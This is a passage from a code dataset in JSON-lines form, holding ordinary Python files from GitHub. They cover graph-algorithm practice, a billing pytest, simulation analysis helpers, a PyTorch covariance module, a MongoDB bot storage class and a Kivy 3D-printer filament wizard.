sys.exit()\n","repo_name":"omk42/Smart-Water-System","sub_path":"lib/Led.py","file_name":"Led.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10271445626","text":"# a, b, d = depth first traversal\n# a, b, c = breadth first traversal\n\n# depth first: stack\n# breadth first: queue\n\n\ngraph = {\n \"a\": [\"c\", \"b\"],\n \"b\": [\"d\"],\n \"c\": [\"e\"],\n \"d\": [\"f\"],\n \"e\": [],\n \"f\": [],\n}\n\n# depth first traversal: printing\n\n\ndef depthFirstPrinting(graph, source):\n # source is like the starting node\n stack = [source]\n while len(stack) > 0:\n current = stack.pop()\n print(current)\n for neighbour in graph[current]:\n stack.append(neighbour)\n # return stack # a, c, e, b, d, f <- this order depends on a's order of neighbours.\n\n\n# _________________________________________\n# UNCOMMENT FUNCTION CALL: DEPTH_FIRST_PRINT\n# depthFirstPrinting(graph, 'a')\n\n\n# ___________________ RECURSION _________________\ndef depthFirstPrintRecursion(graph, source):\n print(source)\n for neighbour in graph[source]:\n depthFirstPrintRecursion(graph, neighbour)\n\n\n# _________________________________________\n# UNCOMMENT FUNCTION CALL: DEPTH_FIRST_PRINT_RECURSION\n# depthFirstPrintRecursion(graph, 'a')\n\n\n# _____________ BREADTH FIRST PRINT _____________\n# BREADTH FIRST PRINT (only iterative) : queue\ndef breadthFirstPrint(graph, source):\n queue = [source]\n while len(queue) > 0:\n current = queue.pop(0)\n print(current)\n for neighbour in graph[current]:\n queue.append(neighbour)\n\n\n# _________________________________________\n# UNCOMMENT FUNCTION CALL: BREADTH_FIRST_PRINT\n# breadthFirstPrint(graph, 'a')\n\n\n# ____________________ HASPATH __________________\n# indication whether we can travel from source(src) to destination (dst) node. returning True or False\n\n# DEPTH FIRST HAS_PATH RECURSION\n\n\ndef haspathDepth(graph, src, dst):\n if src is dst:\n return True\n for neighbour in graph[src]:\n if haspathDepth(graph, neighbour, dst):\n return True\n return False\n\n\n# _________________________________________\n# UNCOMMENT FUNCTION CALL HAS_PATH_DEPTH\n# print(haspathDepth(graph, 'a', 'f'))\n\n\n# # BREADTH FIRST HAS_PATH\n\n\n# breadthfirstHasPath\ndef breadth_has_path(graph, src, dst):\n queue = [src]\n while len(queue) > 0:\n current = queue.pop(0)\n if current == dst:\n return True\n for neighbour in graph[current]:\n queue.append(neighbour)\n return False\n\n\n# _________________________________________\n# UNCOMMENT FUNCTION CALL HAS_PATH_BREADTH\n# print(breadth_has_path(graph, 'a', 'f'))\n\n\n# ____________________ UNDIRECTED_PATH_DEPTH __________________\n# looking for path between src and destination: undirected\n\n\ndef undirected_path_depth(edges, nodeA, nodeB):\n graph = build_graph(edges)\n return hasPath(graph, nodeA, nodeB, set())\n\n\ndef hasPath(graph, src, dst, visited):\n # if src is destination return True\n if src == dst:\n return True\n # if we have visited the node before we can return False\n if src in visited:\n return False\n visited.add(src)\n for neighbour in graph[src]:\n if hasPath(graph, neighbour, dst, visited) is True:\n return True\n return False\n\n\n# below is an edge list. every pair in this list represents a connection between 2 nodes.\nedges = [\n [\"i\", \"j\"],\n [\"k\", \"i\"],\n [\"m\", \"k\"],\n [\"k\", \"l\"],\n [\"o\", \"n\"],\n]\n\n\ndef build_graph(edges):\n graph = {}\n for edge in edges:\n a, b = edge\n if a not in graph:\n graph[a] = []\n if b not in graph:\n graph[b] = []\n graph[a].append(b)\n graph[b].append(a)\n return graph\n\n\n# build_graph converts the edges list into the adjacency list below. adjacency lists are like the default comfortable format.\n# best to convert the edge list into an adjacency list.\n# adjacency list:\n# graph = {\n# i: [j, k],\n# j: [i],\n# k: [i, m, l],\n# m: [k],\n# l: [k],\n# o: [n],\n# n: [o]\n# }\n\n# _________________________________________\n# UNCOMMENT FUNCTION CALL UNDIRECTED_PATH_DEPTH\n# print(undirected_path_depth(edges, 'i', 'o'))\n\n\n# ____________________ CONNECTED_COMPONENTS_COUNT __________________\n# the result for the undirected graph below: 3 CONNECTED COMPONENTS: 1-2 ||| 4-5-6-7-8 ||| 3\ngraph_connected_components = {\n 3: [],\n 4: [6],\n 6: [4, 5, 7, 8],\n 8: [6],\n 7: [6],\n 5: [6],\n 1: [2],\n 2: [1],\n}\n\n# combine graph traversal and iterative code.\n\n\ndef connected_components(graph):\n visited = set()\n count = 0\n for node in graph:\n # uncomment below to see the set visited.\n # print(visited)\n if explore(graph, node, visited) is True:\n count += 1\n return count\n\n\ndef explore(graph, current, visited):\n if current in visited:\n return False\n visited.add(current)\n for neighbour in graph[current]:\n explore(graph, neighbour, visited)\n return True\n\n\n# _________________________________________\n# UNCOMMENT FUNCTION CALL CONNECTED_COMPONENTS_COUNT\n# print(connected_components(graph_connected_components))\n\n\n# timestamp 1:15:03\n# ____________________ LARGEST_COMPONENT __________________\n# 2 components: 1-0-5-8(size4) ||| 4-2-3(size3)\nad_list_largest_component = {\n 0: [8, 1, 5],\n 1: [0],\n 5: [0, 8],\n 8: [0, 5],\n 2: [3, 4],\n 3: [2, 4],\n 4: [3, 2],\n}\n\n\ndef largest_component(graph):\n visited = set()\n largest = 0\n for node in graph:\n size = explore_size(graph, node, visited)\n if size > largest:\n largest = size\n return largest\n\n\ndef explore_size(graph, node, visited):\n if node in visited:\n return 0\n visited.add(node)\n size = 1\n for neighbour in graph[node]:\n size += explore_size(graph, neighbour, visited)\n return size\n\n\n# _________________________________________\n# UNCOMMENT FUNCTION CALL GRAPH_LARGEST_COMPONENT\n# print(largest_component(ad_list_largest_component))\n\n\n# timestamp 1:24:06 SHORTEST PATH\n# taking in edgelist\n\nshortest_path_edgelist = [\n [\"w\", \"x\"],\n [\"x\", \"y\"],\n [\"z\", \"y\"],\n [\"z\", \"v\"],\n [\"w\", \"v\"],\n [\"g\", \"h\"],\n]\n\n\ndef build_shortest_path_ad_list(edgelist):\n graph = {}\n for item in edgelist:\n a, b = item\n if a not in graph:\n graph[a] = []\n if b not in graph:\n graph[b] = []\n graph[a].append(b)\n graph[b].append(a)\n return graph\n\n\nshortest_path_ad_list = build_shortest_path_ad_list(shortest_path_edgelist)\n\n# print(shortest_path_ad_list)\n\n\n# if there is a path, nodeA == nodeB, return distance.\ndef shortest_path(edges, nodeA, nodeB):\n graph = build_shortest_path_ad_list(edges)\n visited = set([nodeA])\n queue = [[nodeA, 0]]\n while len(queue) > 0:\n node, distance = queue.pop(0)\n if node == nodeB:\n return distance\n for neighbour in graph[node]:\n if neighbour not in visited:\n visited.add(neighbour)\n queue.append((neighbour, distance + 1))\n return f\"No path found between {nodeA} and {nodeB}.\"\n\n\n# _________________________________________\n# UNCOMMENT FUNCTION CALL SHORTEST_PATH\n# print(shortest_path(shortest_path_edgelist, \"w\", \"z\")) # 2\n# print(shortest_path(shortest_path_edgelist, \"x\", \"h\")) # no path found\n\n\nisland_grid = [\n [\"W\", \"L\", \"W\", \"W\", \"W\"],\n [\"W\", \"L\", \"W\", \"W\", \"W\"],\n [\"W\", \"W\", \"W\", \"L\", \"W\"],\n [\"W\", \"W\", \"L\", \"L\", \"W\"],\n [\"L\", \"W\", \"W\", \"L\", \"L\"],\n [\"L\", \"L\", \"W\", \"W\", \"W\"],\n]\n\n\ndef island_count(grid):\n visited = set()\n count = 0\n for r in range(len(grid)):\n for c in range(len(grid[0])):\n if explore(grid, r, c, visited):\n count += 1\n return count\n\n\ndef explore(grid, r, c, visited):\n row_inbounds = 0 <= r < len(grid)\n col_inbounds = 0 <= c < len(grid[0])\n if not row_inbounds or not col_inbounds:\n return False\n if grid[r][c] == \"W\":\n return False\n\n pos = (r, c)\n if pos in visited:\n return False\n visited.add(pos)\n\n explore(grid, r - 1, c, visited)\n explore(grid, r + 1, c, visited)\n explore(grid, r, c - 1, visited)\n explore(grid, r, c + 1, visited)\n\n return True\n\n\n# _________________________________________\n# UNCOMMENT FUNCTION CALL: ISLAND COUNT\n# print(island_count(island_grid))\n\n\nminimum_island_grid = [\n [\"L\", \"W\", \"L\", \"L\", \"W\"],\n [\"L\", \"W\", \"W\", \"L\", \"L\"],\n [\"W\", \"W\", \"W\", \"L\", \"W\"],\n [\"W\", \"W\", \"W\", \"W\", \"W\"],\n [\"W\", \"W\", \"L\", \"L\", \"L\"],\n]\n\n\ndef minimum_island(grid):\n all_islands = []\n visited = set()\n for r in range(len(grid)):\n for c in range(len(grid[0])):\n x = explore(grid, r, c, visited)\n if x:\n all_islands.append(x)\n return min(all_islands)\n\n\ndef explore(grid, r, c, visited):\n row_inbounds = 0 <= r < len(grid)\n col_inbounds = 0 <= c < len(grid[0])\n if not row_inbounds or not col_inbounds:\n return 0\n if grid[r][c] == \"W\":\n return 0\n\n pos = (r, c)\n if pos in visited:\n return 0\n visited.add(pos)\n\n size = 1\n size += explore(grid, r - 1, c, visited)\n size += explore(grid, r + 1, c, visited)\n size += explore(grid, r, c + 1, visited)\n size += explore(grid, r, c - 1, visited)\n\n return size\n\n\n# _________________________________________\n# UNCOMMENT FUNCTION CALL: MINIMUM ISLAND\nprint(minimum_island(minimum_island_grid))\n","repo_name":"oliverchong97/Technical_DS","sub_path":"Technical_Interview_DS_Algorithms/Interview_Algorithms=Graphs.py","file_name":"Interview_Algorithms=Graphs.py","file_ext":"py","file_size_in_byte":9337,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"29234409547","text":"import pytest\n\nfrom maps_adv.billing_proxy.lib.data_manager.exceptions import ClientsDoNotExist\nfrom maps_adv.billing_proxy.lib.domain.exceptions import ClientDoesNotExist\n\npytestmark = [pytest.mark.asyncio, pytest.mark.mock_dm]\n\n\nasync def test_calls_dm(clients_domain, clients_dm):\n\n await clients_domain.set_account_manager_for_client(\n client_id=11, account_manager_id=100500\n )\n\n clients_dm.set_account_manager_for_client.assert_called_with(11, 100500)\n\n\nasync def test_raises_for_nonexistent_agency(factory, clients_dm, clients_domain):\n inexistent_id = await factory.get_inexistent_client_id()\n\n clients_dm.set_account_manager_for_client.coro.side_effect = ClientsDoNotExist(\n client_ids=[inexistent_id]\n )\n\n with pytest.raises(ClientDoesNotExist) as exc:\n await clients_domain.set_account_manager_for_client(\n client_id=inexistent_id, account_manager_id=100500\n )\n\n assert exc.value.client_id == inexistent_id\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"maps/tests/domain/clients/test_set_account_manager.py","file_name":"test_set_account_manager.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6865294832","text":"import numpy as np\nfrom pandas import Series\nfrom .ptre import Ptre\n\n\ndef is_crystal() -> bool:\n pass\n\n\ndef check_vle_density(series: Series) -> (bool, bool, [float]):\n '''\n Check in a density series is interface\n\n :param series: density series. The index is the z axis\n :return: is interface: bool\n center is gas phase: bool\n location of changing nodes [float]\n '''\n interval = series.index[1] - series.index[0]\n\n result, peaks = Ptre.test_data(series, interval) # the peaks starts from 0, not original index\n peaks.sort(key=lambda x: x[0])\n\n if result != Ptre._PATTERN_A:\n return False, None, None\n\n nodes = [p[0] + series.index[0] for p in peaks]\n return True, peaks[0][1] > 0, nodes\n\n\ndef N_vaporize_condense(phases) -> (int, int):\n '''\n Check the number of vaporize and condensation\n\n :param list: ['l', 'i', 'g'], liquid, interface, gas\n :return: (N_vapor, N_condense)\n '''\n N_vapor = N_condense = 0\n phases = [i for i in phases if i != 'i']\n while len(phases) > 1:\n if phases[0] == 'l' and phases[1] == 'g':\n N_vapor += 1\n elif phases[0] == 'g' and phases[1] == 'l':\n N_condense += 1\n phases.pop(0)\n\n return N_vapor, N_condense\n\n\ndef check_interface(series: Series, debug=False) -> (bool, list):\n interval = series.index[1] - series.index[0]\n\n result, peaks = Ptre.test_data(series, interval, debug=debug)\n\n if debug:\n try:\n import pylab\n except:\n print('matplotlib not found, cannot debug')\n else:\n t = np.array(series.index) - series.index[0]\n pylab.plot(t, series)\n if result in [Ptre._PATTERN_A, Ptre._PATTERN_D]:\n pylab.vlines([p[0] for p in peaks], 0, 1, colors='red')\n pylab.show()\n\n for i in range(0, len(peaks)):\n if peaks[i][1] < 0:\n state = 'INCREASING'\n else:\n state = 'DECREASING'\n print(state, peaks[i][0])\n\n if result == Ptre._PATTERN_A:\n return True, peaks\n else:\n return False, peaks\n\n\ndef angular_momentum(com, mass_list, corr_list, vel_list, vel_com):\n ### TODO Not sure whether it is correct\n Lx = Ly = Lz = 0\n for i, corr in enumerate(corr_list):\n dx = corr[0] - com[0]\n dy = corr[1] - com[1]\n dz = corr[2] - com[2]\n vx = vel_list[i][0] - vel_com[0]\n vy = vel_list[i][1] - vel_com[1]\n vz = vel_list[i][2] - vel_com[2]\n mass = mass_list[i]\n Lx += mass * (dy * vz - dz * vy)\n Ly += mass * (dz * vx - dx * vz)\n Lz += mass * (dx * vy - dy * vx)\n return Lx, Ly, Lz\n\n\ndef velocity_com(mass_list, vel_list):\n Vx = Vy = Vz = 0\n for i, vel in enumerate(vel_list):\n vx = vel_list[i][0]\n vy = vel_list[i][1]\n vz = vel_list[i][2]\n mass = mass_list[i]\n\n Vx += mass * vx\n Vy += mass * vy\n Vz += mass * vz\n total_mass = sum(mass_list)\n Vx /= total_mass\n Vy /= total_mass\n Vz /= total_mass\n\n return Vx, Vy, Vz\n","repo_name":"sungroup-sjtu/AIMS_Tools","sub_path":"mstools/analyzer/structure.py","file_name":"structure.py","file_ext":"py","file_size_in_byte":3139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4009469940","text":"# -*- coding: utf-8 -*-\n# @Auther : Mingsong Li (lms-07)\n# @Time : 2023-Apr\n# @Address : Time Lab @ SDU\n# @FileName : DCR.py\n# @Project : AMS-M2ESL (HSIC), IEEE TGRS\n\nimport torch\nimport torch.nn as nn\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n'''\nfor the two implementations of distance covariance represntation (DCR),\nthe implementation1 (_DCR_1) is based on DeepBDC, i.e.,\nJoint Distribution Matters: Deep Brownian Distance Covariance for Few-Shot Classification, CVPR 2022 \nhttps://github.com/Fei-Long121/DeepBDC/blob/main/methods/bdc_module.py,\nand _DCR_2 is our original implementation based on Brownian distance covariance, https://doi.org/10.1214/09-AOAS312.\nthe two implementations achieve similar performance in our AMS-M2ESL framework, we randomly chose _DCR_1 as the final version.\n'''\n\n\nclass Spectral_corr_mining(nn.Module):\n def __init__(self, in_channels):\n super(Spectral_corr_mining, self).__init__()\n self.temperature = nn.Parameter(\n torch.log((3.2 / (in_channels * in_channels)) * torch.ones(1, 1, device=device)), requires_grad=True)\n\n def forward(self, x):\n x_corr = self._DCR_1(x, self.temperature)\n # x_corr=self._DCR_2(x)\n\n # for abla of DCR\n # x_corr=self._CR(x)\n\n return x_corr\n\n def _DCR_1(self, x, t):\n len_x = len(x.size())\n\n if len_x == 3:\n # spatial\n batchSize, c, h_w = x.size()\n x = x.permute(0, 2, 1)\n c = h_w\n elif len_x == 4:\n # spectral channel\n batchSize, c, h, w = x.size()\n h_w = h * w\n x = x.reshape(batchSize, c, h_w)\n\n I = torch.eye(c, c, device=x.device).view(1, c, c).repeat(batchSize, 1, 1).type(x.dtype)\n I_M = torch.ones(batchSize, c, c, device=x.device).type(x.dtype)\n x_pow2 = x.bmm(x.transpose(1, 2))\n dcov = I_M.bmm(x_pow2 * I) + (x_pow2 * I).bmm(I_M) - 2 * x_pow2\n\n dcov = torch.clamp(dcov, min=0.0)\n dcov = torch.exp(t) * dcov\n dcov = torch.sqrt(dcov + 1e-5)\n\n out = dcov - 1. / c * dcov.bmm(I_M) - 1. / c * I_M.bmm(dcov) + 1. / (c * c) * I_M.bmm(dcov).bmm(I_M)\n\n return out * (-1)\n\n def _DCR_2(self, x):\n batch_size, c, h, w = x.size()\n\n x = x.view(batch_size, -1, h * w).permute(0, 2, 1)\n\n x = x.permute(0, 2, 1)\n x1, x2 = x[:, :, None], x[:, None]\n x3 = x1 - x2\n band_l2_mat = torch.norm(x3, dim=3, p=2)\n\n bem_mean_row, becm_mean_col = torch.mean(band_l2_mat, dim=1, keepdim=True), torch.mean(band_l2_mat, dim=2,\n keepdim=True)\n bem_mean_row_expand, becm_mean_col_expand = bem_mean_row.expand(band_l2_mat.shape), becm_mean_col.expand(\n band_l2_mat.shape)\n bem_mean_plus_row_col = bem_mean_row_expand + becm_mean_col_expand\n bem_mean_all = torch.mean(bem_mean_row, dim=2)\n becm = band_l2_mat - bem_mean_plus_row_col + torch.unsqueeze(bem_mean_all, dim=-1)\n\n return becm * (-1)\n\n def _CR(self, x):\n batch_size, c, h, w = x.size()\n\n x = x.view(batch_size, -1, h * w).permute(0, 2, 1)\n mean_pixel = torch.mean(x, dim=1, keepdim=True)\n mean_pixel_expand = mean_pixel.expand(x.shape)\n\n x_cr = x - mean_pixel_expand\n CR = torch.bmm(x_cr.permute(0, 2, 1), x_cr)\n CR = torch.div(CR, h * w - 1)\n\n return CR\n","repo_name":"Candy-CY/Hyperspectral-Image-Classification-Models","sub_path":"AMS-M2ESL/model/module/DCR.py","file_name":"DCR.py","file_ext":"py","file_size_in_byte":3488,"program_lang":"python","lang":"en","doc_type":"code","stars":237,"dataset":"github-code","pt":"3"} +{"seq_id":"35866160693","text":"from jsonpickle.pickler import Pickler\r\nfrom jsonpickle.unpickler import Unpickler\r\nfrom typing import Dict, List\r\nfrom botbuilder.core import Storage\r\nimport motor.motor_asyncio\r\n\r\n\r\nclass MongodbStorage(Storage):\r\n \"\"\"The class for MongoDB middleware for the Azure Bot Framework.\"\"\"\r\n\r\n ID_TAG = 'real_id'\r\n DOCUMENT_TAG = 'document'\r\n\r\n def __init__(self, connection_string, db, collection, **kwargs):\r\n \"\"\"Create the storage object.\r\n\r\n :param connection_string: mongoDB connection URI\r\n :param db: db name\r\n :param collection: collection name\r\n :param kwargs: parameters to pass to MongoClient as keyword arguments\r\n \"\"\"\r\n super(MongodbStorage, self).__init__()\r\n\r\n self.connection_string = connection_string\r\n self.db_name = db\r\n self.collection_name = collection\r\n\r\n self.mongodb_client = motor.motor_asyncio.AsyncIOMotorClient(self.connection_string, **kwargs)\r\n self.db = self.mongodb_client[self.db_name]\r\n\r\n async def write(self, changes: Dict[str, object]):\r\n \"\"\"Save storeitems to storage.\r\n\r\n :param changes:\r\n :return:\r\n \"\"\"\r\n if changes is None:\r\n raise Exception(\"Changes are required when writing\")\r\n if not changes:\r\n return\r\n try:\r\n # get the collection to save changes in\r\n collection = self.__collection\r\n\r\n for (key, change) in changes.items():\r\n # create a dictionary from the change object\r\n doc = self.__create_dict(change)\r\n\r\n # save each change in db collection\r\n await collection.update_one({MongodbStorage.ID_TAG: key},\r\n {'$set': {MongodbStorage.DOCUMENT_TAG: doc}},\r\n upsert=True)\r\n except Exception as error:\r\n raise error\r\n\r\n async def read(self, keys: List[str]):\r\n \"\"\"Read storeitems from storage.\r\n\r\n :param keys:\r\n :return dict:\r\n \"\"\"\r\n data = {}\r\n if not keys:\r\n return data\r\n try:\r\n # get the collection to read storeitems from\r\n collection = self.__collection\r\n\r\n # get the data for given keys from db collection\r\n data_from_db = collection.find({MongodbStorage.ID_TAG: {'$in': keys}})\r\n\r\n async for item in data_from_db:\r\n # create a storeitem from each db and save it in the result dictionary\r\n data[item[MongodbStorage.ID_TAG]] = self.__create_object(item)\r\n except TypeError as error:\r\n raise error\r\n\r\n return data\r\n\r\n async def delete(self, keys: List[str]):\r\n \"\"\"Remove storeitems from storage.\r\n\r\n :param keys:\r\n :return:\r\n \"\"\"\r\n try:\r\n # get the collection to delete storeitems from\r\n collection = self.__collection\r\n\r\n # delete all storeitems for given keys\r\n await collection.delete_many({MongodbStorage.ID_TAG: {'$in': keys}})\r\n except TypeError as error:\r\n raise error\r\n\r\n @property\r\n def __collection(self) -> motor.motor_asyncio.AsyncIOMotorCollection:\r\n \"\"\"Return db collection where storeitems are stored.\r\n\r\n :param:\r\n :return motor.motor_asyncio.AsyncIOMotorCollection:\r\n \"\"\"\r\n return self.db[self.collection_name]\r\n\r\n @staticmethod\r\n def __create_object(result) -> object:\r\n \"\"\"Create an object from a result out of MongoDb.\r\n\r\n :param result:\r\n :return object:\r\n \"\"\"\r\n # get the document item from the result and turn into a dict\r\n doc = result.get(MongodbStorage.DOCUMENT_TAG)\r\n\r\n # create and return the object\r\n result_obj = Unpickler().restore(doc)\r\n\r\n return result_obj\r\n\r\n @staticmethod\r\n def __create_dict(store_item: object) -> Dict:\r\n \"\"\"Return the dict of an object.\r\n This eliminates non_magic attributes and the e_tag.\r\n\r\n :param store_item:\r\n :return dict:\r\n \"\"\"\r\n # read the content\r\n json_dict = Pickler().flatten(store_item)\r\n if \"e_tag\" in json_dict:\r\n del json_dict[\"e_tag\"]\r\n\r\n return json_dict\r\n","repo_name":"aramayyes/Dram-Chatbot","sub_path":"src/storage/mongodb_storage.py","file_name":"mongodb_storage.py","file_ext":"py","file_size_in_byte":4306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19823067949","text":"# -*- coding: utf-8 -*-\nfrom kivy.uix.button import Button\nfrom kivy.properties import StringProperty, NumericProperty\nfrom kivy.uix.floatlayout import FloatLayout\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.label import Label\nfrom kivy.uix.widget import Widget\nfrom kivy.uix.togglebutton import ToggleButton\nfrom .. import roboprinter\nfrom functools import partial\nfrom kivy.logger import Logger\nfrom kivy.clock import Clock\nfrom pconsole import pconsole\nimport thread\nfrom Filament_Wizard import Filament_Wizard_Finish, Filament_Wizard_1_5, Filament_Wizard_2_5, Filament_Wizard_3_5, Filament_Wizard_4_5, Filament_Wizard_5_5\nfrom printer_jog import printer_jog\nfrom Preheat_Wizard import Preheat_Overseer\n\nclass FilamentWizard(Widget):\n \"\"\" \"\"\"\n temp = NumericProperty(0.0)\n layout2 = None\n extrude_event = None\n def __init__(self, loader_changer, robosm, name, **kwargs):\n super(FilamentWizard, self).__init__(**kwargs)\n # first screen defined in .kv file\n self.sm = robosm\n self.name = name #name of initial screen\n self.load_or_change = loader_changer\n #check if the printer is printing\n current_data = roboprinter.printer_instance._printer.get_current_data()\n self.is_printing = current_data['state']['flags']['printing']\n self.is_paused = current_data['state']['flags']['paused']\n self.tmp_event = None\n self.s_event = None\n self.E_Position = None\n\n if self.is_printing or self.is_paused:\n\n #get the E Position\n pos = pconsole.get_position()\n while not pos:\n pos = pconsole.get_position()\n\n self.E_Position = pos[3]\n\n self.first_screen(**kwargs)\n self.poll_temp() #populates self.temp\n\n def first_screen(self, **kwargs):\n \"\"\"\n First Screen:\n displays Start button that will open second_screen\n \"\"\"\n \n if self.is_printing or self.is_paused:\n layout = Filament_Wizard_1_5(self.second_screen)\n else:\n layout = Filament_Wizard_1_5(self.choose_material)\n \n self.sm._generate_backbutton_screen(name=self.name, title=kwargs['title'], back_destination=kwargs['back_destination'], content=layout)\n\n def choose_material(self, *args):\n \n Preheat_Overseer(end_point=self.collect_heat_settings,\n name='preheat_wizard',\n title=roboprinter.lang.pack['Utilities']['Preheat'],\n back_destination=self.name)\n\n def collect_heat_settings(self, extruder, bed):\n self.print_temperature = extruder\n self.print_bed_temperature = bed\n self.second_screen()\n\n def second_screen(self, *args):\n \"\"\"\n the Heating Screen:\n Sets the temperature of the extruder to 230\n Display heating status to user\n Open third screen when temperature hits 230\n \"\"\"\n #display heating status to user\n\n #end the event before starting it again\n if self.extrude_event != None:\n self.end_extrude_event()\n\n\n if self.load_or_change == 'CHANGE':\n _title = roboprinter.lang.pack['Filament_Wizard']['Title_15']\n else:\n _title = roboprinter.lang.pack['Filament_Wizard']['Title_14']\n\n # Heat up extruder\n if not self.is_printing and not self.is_paused:\n self.layout2 = Filament_Wizard_2_5(self.print_temperature)\n back_destination = 'preheat_wizard'\n \n this_screen = self.sm._generate_backbutton_screen(name=self.name+'[1]', title=_title, back_destination=back_destination, content=self.layout2)\n #back_button will also stop the scheduled events: poll_temp and switch_to_third_screen\n this_screen.ids.back_button.bind(on_press=self.cancel_second_screen_events)\n\n roboprinter.printer_instance._printer.set_temperature('tool0', self.print_temperature)\n self.tmp_event = Clock.schedule_interval(self.poll_temp, .5) #stored so we can stop them later\n self.s_event = Clock.schedule_interval(self.switch_to_third_screen, .75) #stored so we can stop them later\n else:\n if self.load_or_change == 'CHANGE':\n self.third_screen()\n \n elif self.load_or_change == 'LOAD':\n self.fourth_screen()\n \n ###Second screen helper functions ###\n def cancel_second_screen_events(self, *args):\n if self.tmp_event != None and self.s_event != None:\n self.tmp_event.cancel()\n self.s_event.cancel()\n\n def update_temp_label(self, obj, *args):\n # updates the temperature for the user's view\n obj.text = str(self.temp) + roboprinter.lang.pack['Filament_Wizard']['Celsius_Alone']\n\n def poll_temp(self, *args):\n # updates the temperature\n r = roboprinter.printer_instance._printer.get_current_temperatures()\n self.temp = r['tool0']['actual']\n if self.layout2 != None:\n self.layout2.update_temp(self.temp)\n\n def switch_to_third_screen(self, *args):\n # switches to third screen when temperature is set\n if self.temp >= self.print_temperature:\n if self.load_or_change == 'CHANGE':\n self.third_screen()\n # clock event no longer needed\n self.cancel_second_screen_events()\n elif self.load_or_change == 'LOAD':\n self.fourth_screen()\n # clock event no longer needed\n self.cancel_second_screen_events()\n #####################################\n\n def third_screen(self):\n \"\"\"\n Pull filament Screen:\n Display instructions to user -- Pull out filament\n Display button that will open fourth screen\n \"\"\"\n # roboprinter.printer_instance._printer.jog('e', -130.00)\n c = Filament_Wizard_3_5(self.fourth_screen)\n back_destination = roboprinter.robo_screen()\n this_screen = self.sm._generate_backbutton_screen(name=self.name+'[2]', title=roboprinter.lang.pack['Filament_Wizard']['Title_25'], back_destination=back_destination, content=c)\n\n #end the event before starting it again\n if self.extrude_event != None:\n self.end_extrude_event()\n\n #extrude a little bit before retracting\n roboprinter.printer_instance._printer.extrude(20.0)\n self.extrude_event = Clock.schedule_interval(self.retract, 1)\n\n\n # back_button deletes Second Screen, as back destination is first screen\n # second_screen = self.sm.get_screen(self.name+'[1]')\n # delete_second = partial(self.sm.remove_widget, second_screen)\n # this_screen.ids.back_button.bind(on_press=delete_second)\n\n def fourth_screen(self, *args):\n \"\"\"\n Load filament screen:\n Display instructions to user -- Load filament\n Display button that will open fifth screen\n \"\"\"\n\n if self.load_or_change == 'CHANGE':\n _title = roboprinter.lang.pack['Filament_Wizard']['Title_35']\n back_dest = self.name+'[2]'\n else:\n _title = roboprinter.lang.pack['Filament_Wizard']['Title_24']\n back_dest = self.name\n\n if self.extrude_event != None:\n self.end_extrude_event()\n c = Filament_Wizard_4_5(self.fifth_screen)\n back_destination = roboprinter.robo_screen()\n self.sm._generate_backbutton_screen(name=self.name+'[3]', title=_title, back_destination=back_destination, content=c)\n\n def fifth_screen(self, *args):\n \"\"\"\n Final screen / Confirm successful load:\n Extrude filament\n Display instruction to user -- Press okay when you see plastic extruding\n Display button that will move_to_main() AND stop extruding filament\n \"\"\"\n if self.load_or_change == 'CHANGE':\n _title = roboprinter.lang.pack['Filament_Wizard']['Title_45']\n back_dest = self.name+'[3]'\n else:\n _title = roboprinter.lang.pack['Filament_Wizard']['Title_34']\n back_dest = self.name+'[3]'\n\n c = Filament_Wizard_5_5(self.end_wizard)\n back_destination = roboprinter.robo_screen()\n self.sm._generate_backbutton_screen(name=self.name+'[4]', title=_title, back_destination=back_destination, content=c)\n\n #end the event before starting it again\n if self.extrude_event != None:\n self.end_extrude_event()\n self.extrude_event = Clock.schedule_interval(self.extrude, 1)\n\n def extrude(self, *args):\n # wrapper that can accept the data pushed to it by Clock.schedule_interval when called\n if self.sm.current == 'filamentwizard[4]':\n roboprinter.printer_instance._printer.extrude(5.0)\n else:\n self.end_extrude_event()\n Logger.info(\"Canceling due to Screen change\")\n def retract(self, *args):\n if self.sm.current == 'filamentwizard[2]':\n roboprinter.printer_instance._printer.extrude(-5.0)\n else:\n self.end_extrude_event()\n Logger.info(\"Canceling due to Screen change\")\n\n def retract_after_session(self, *args):\n roboprinter.printer_instance._printer.extrude(-10.0)\n\n def end_extrude_event(self, *args):\n self.extrude_event.cancel()\n\n def end_wizard(self, *args):\n\n \n\n \n self.extrude_event.cancel()\n c = Filament_Wizard_Finish()\n\n if self.load_or_change == 'CHANGE':\n _title = roboprinter.lang.pack['Filament_Wizard']['Title_55']\n\n else:\n _title = roboprinter.lang.pack['Filament_Wizard']['Title_44']\n\n #set the E position back to it's original position\n if self.E_Position != None:\n roboprinter.printer_instance._printer.commands(\"G92 E\" + str(self.E_Position)) \n\n #if it is printing or paused don't cool down\n if not self.is_printing and not self.is_paused:\n #retract 10mm\n self.retract_after_session()\n\n #cooldown\n roboprinter.printer_instance._printer.commands('M104 S0')\n roboprinter.printer_instance._printer.commands('M140 S0')\n\n back_destination = roboprinter.robo_screen()\n self.sm._generate_backbutton_screen(name=self.name+'[5]', title=_title, back_destination=back_destination, content=c)\n\n\n def _generate_layout(self, l_text, btn_text, f):\n \"\"\"\n Layouts are similar in fashion: Text and Call to Action button\n creates layout with text and button and binds f to button\n \"\"\"\n layout = BoxLayout(orientation='vertical')\n btn = Button(text=btn_text, font_size=30)\n l = Label(text=l_text, font_size=30)\n btn.bind(on_press=f)\n layout.add_widget(l)\n layout.add_widget(btn)\n return layout\n","repo_name":"mcecchi/SuperOcto","sub_path":"RoboLCD/RoboLCD/lcd/wizard.py","file_name":"wizard.py","file_ext":"py","file_size_in_byte":10943,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"70953418001","text":"# -*- coding: UTF-8 -*-\n\nimport sys\n\nfrom PySide2.QtCore import *\nfrom 